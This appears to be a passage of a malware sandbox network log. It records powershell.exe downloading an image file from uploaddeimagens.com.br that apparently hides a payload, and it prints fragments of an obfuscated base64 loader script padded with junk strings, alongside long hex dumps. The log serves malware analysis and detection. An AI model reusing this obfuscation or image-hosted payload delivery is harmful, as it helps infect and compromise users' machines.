44 67 54 72 65 59 51 42 79 44 67 54 72 65 48 51 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20
          Data Ascii: 164cgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTre" & malhorquino & subface & malhorquino & "DgTreBJDgTreG4DgTre" & malhorquino & subface & malhorquino & "DgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTre" &
          2024-06-14 13:15:01 UTC1369INData Raw: 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 44 67 54 72 65 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 73 75 62 66 61 63 65 20 26 20 6d 61 6c 68 6f 72 71 75 69 6e 6f 20 26 20 22 51 42 6b 44 67 54 72 65 45 45 44 67 54 72 65 63 77 42 7a 44 67 54 72 65 47 55 44 67 54 72 65 62 51 42 69 44 67 54 72 65 47 77 44 67 54 72 65 65 51 44 67 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 46 4d 44 67 54 72 65 65 51 42 7a 44 67 54 72 65 48 51 44 67 54 72
          Data Ascii: gTre" & malhorquino & subface & malhorquino & "DgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTre" & malhorquino & subface & malhorquino & "QBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTr
          2024-06-14 13:15:01 UTC1369INData Raw: 44 67 54 72 65 57 77 42 64 44 67 54 72 65 46 30 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6f 44 67 54 72 65 43 63 44 67 54 72 65 64 44 67 54 72 65 42 34 44 67 54 72 65 48 51 44 67 54 72 65 4c 67 42 6b 44 67 54 72 65 48 49 44 67 54 72 65 62 77 42 33 44 67 54 72 65 48 4d 44 67 54 72 65 4c 77 44 67 54 72 65 78 44 67 54 72 65 44 63 44 67 54 72 65 4c 67 44 67 54 72 65 35 44 67 54 72 65 44 4d 44 67 54 72 65 4c 67 44 67 54 72 65 7a 44 67 54 72 65 44 49 44 67 54 72 65 4d 51 44 67 54 72 65 75 44 67 54 72 65 44 4d 44 67 54 72 65 4f 51 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 4f 67 42 77 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 6f 44 67 54 72 65 43 63 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 73 44 67 54 72 65 43 44 67 54 72
          Data Ascii: DgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBkDgTreHIDgTrebwB3DgTreHMDgTreLwDgTrexDgTreDcDgTreLgDgTre5DgTreDMDgTreLgDgTrezDgTreDIDgTreMQDgTreuDgTreDMDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTr


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.849707188.114.97.34437908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          TimestampBytes transferredDirectionData
          2024-06-14 13:15:04 UTC124OUTGET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1
          Host: uploaddeimagens.com.br
          Connection: Keep-Alive
          2024-06-14 13:15:05 UTC685INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:05 GMT
          Content-Type: image/jpeg
          Content-Length: 3043973
          Connection: close
          Last-Modified: Thu, 13 Jun 2024 13:08:58 GMT
          ETag: "666aef6a-2e7285"
          Cache-Control: max-age=2678400
          CF-Cache-Status: MISS
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bPFTyp74G038karuzp7b3YXZ91yPNOsAr8ho5OO5edWw%2BUzg9xBbwTewcThhSigXGoQzZZkNmglCNLShjf6T6i3h7V2VZ92lbVx1xwL82bGsiMZrAXe0Fgr4%2BpCjUHECOXphEtt%2Bkvq7"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 893a964a1a3d6c56-DFW
          alt-svc: h3=":443"; ma=86400
          2024-06-14 13:15:05 UTC684INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
          2024-06-14 13:15:05 UTC1369INData Raw: ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9
          Data Ascii: cJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.J9x
          2024-06-14 13:15:05 UTC1369INData Raw: 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 2a 06 41 31 0a
          Data Ascii: 2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*A1
          2024-06-14 13:15:05 UTC1369INData Raw: fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1
          Data Ascii: 2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX}
          2024-06-14 13:15:05 UTC1369INData Raw: 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04
          Data Ascii: cb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./
          2024-06-14 13:15:05 UTC1369INData Raw: 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35 c0 20 fd 78 af
          Data Ascii: axx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5 x
          2024-06-14 13:15:05 UTC1369INData Raw: a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56 a5 f5 20 ab 28
          Data Ascii: ]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV (
          2024-06-14 13:15:05 UTC1369INData Raw: a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6 c6 03 83 ed 4e
          Data Ascii: \#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#N
          2024-06-14 13:15:05 UTC1369INData Raw: 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51 cd 9b
          Data Ascii: #O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5`CQ
          2024-06-14 13:15:05 UTC1369INData Raw: db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b 1e d3 78 44 b3
          Data Ascii: H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|kxD


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.849708188.114.97.34437908C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          TimestampBytes transferredDirectionData
          2024-06-14 13:15:07 UTC100OUTGET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1
          Host: uploaddeimagens.com.br
          2024-06-14 13:15:07 UTC688INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:07 GMT
          Content-Type: image/jpeg
          Content-Length: 3043973
          Connection: close
          Last-Modified: Thu, 13 Jun 2024 13:08:58 GMT
          ETag: "666aef6a-2e7285"
          Cache-Control: max-age=2678400
          CF-Cache-Status: HIT
          Age: 3
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nknBjtjNhiKIHCgbCTEwrahXwDoQi9yOGsZVWkZdz5z728YzVMqPNvNiOTwivPAB3G4L4o5v9p1Kl2fgD8QFyImYwpgUYGQnPOPkBGAMyF%2B3USRMXwfNRpacnUvYmhk7Kw3N67D1SW8a"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 893a96597a812cc8-DFW
          alt-svc: h3=":443"; ma=86400
          2024-06-14 13:15:07 UTC681INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
          2024-06-14 13:15:07 UTC1369INData Raw: b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe
          Data Ascii: ccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.J9
          2024-06-14 13:15:07 UTC1369INData Raw: bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47 2a 06
          Data Ascii: 2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG*
          2024-06-14 13:15:07 UTC1369INData Raw: 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e
          Data Ascii: qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hdX
          2024-06-14 13:15:07 UTC1369INData Raw: af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f
          Data Ascii: scb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./
          2024-06-14 13:15:07 UTC1369INData Raw: 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35 c0 20
          Data Ascii: OKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5
